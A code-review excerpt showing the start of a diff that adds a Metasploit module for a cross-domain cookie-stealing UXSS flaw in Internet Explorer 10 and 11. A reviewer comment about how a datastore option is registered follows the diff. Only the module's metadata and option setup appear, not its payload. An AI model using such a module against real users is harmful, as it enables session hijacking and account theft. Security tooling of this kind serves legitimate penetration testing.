modules/auxiliary/gather/ie_uxss_cookie.rb

```diff
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microsoft Internet Explorer 10 and 11 Cross-domain Cookie Stealing",
+      'Description'    => %q{
+          This module exploits a universal cross-site scripting vulnerability found in Internet
+          Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
+          datastore option). You will also most likely need to configure the MY_PUBLIC_IP
+          datastore option in order receive the cookie. If you and the victim are actually in the
+          same network, then you don't need to touch MY_PUBLIC_IP.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'David Leo', # Original discovery
+          'sinn3r'     # MSF
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
+          [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => "Feb 2 2015"
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
+      OptString.new('MY_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
```

Comment:
Well I actually think this is going to be commonly used, so I leave it as a basic option.

See this documentation:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#the-register_options-method

And see if you want to overrule.